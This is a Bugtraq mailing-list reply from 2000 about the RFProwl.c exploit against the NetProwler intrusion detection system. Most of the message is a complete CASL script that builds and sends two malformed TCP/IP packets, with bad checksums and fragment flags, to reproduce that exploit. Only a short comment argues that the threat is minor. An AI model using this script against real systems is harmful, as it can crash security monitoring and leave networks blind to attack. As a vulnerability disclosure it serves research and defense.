[15019] in bugtraq
Re: RFP2K05: NetProwler vs. RFProwler
daemon@ATHENA.MIT.EDU (Pedro Quintanilha)
Wed May 24 14:56:32 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-Id: <010201bfc510$0af043d0$0729010a@operacoes.abril.com.br>
Date: Tue, 23 May 2000 20:38:47 -0300
Reply-To: Pedro Quintanilha <quinta@certbr.com.br>
From: Pedro Quintanilha <quinta@CERTBR.COM.BR>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
A little more about...
There is a CASL Script that reproduces the RFProwl.c exploit.
This exploit sends two packets with wrong IP checksum, so I
think that it4s not a serious threat like remote attacks from Internet,
since the most routers and firewalls will drop that packets.
[]4s
Pedro Quintanilha
quinta@certbr.com.br
=================================================
#include "tcpip.casl"
#include "packets.casl"
Src = pop args;
Dst = pop args;
Src = getip(Src);
Dst = getip(Dst);
iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;
tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;
pk1data = "\x 0\x 0\x 0\x 0\x 0\x 0";
packet = [ iph, tch, pk1data ];
ip_output(packet);
iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;
tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;
pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0";
packet = [ iph2, tch2, pk2data ];
ip_output(packet);
=================================================
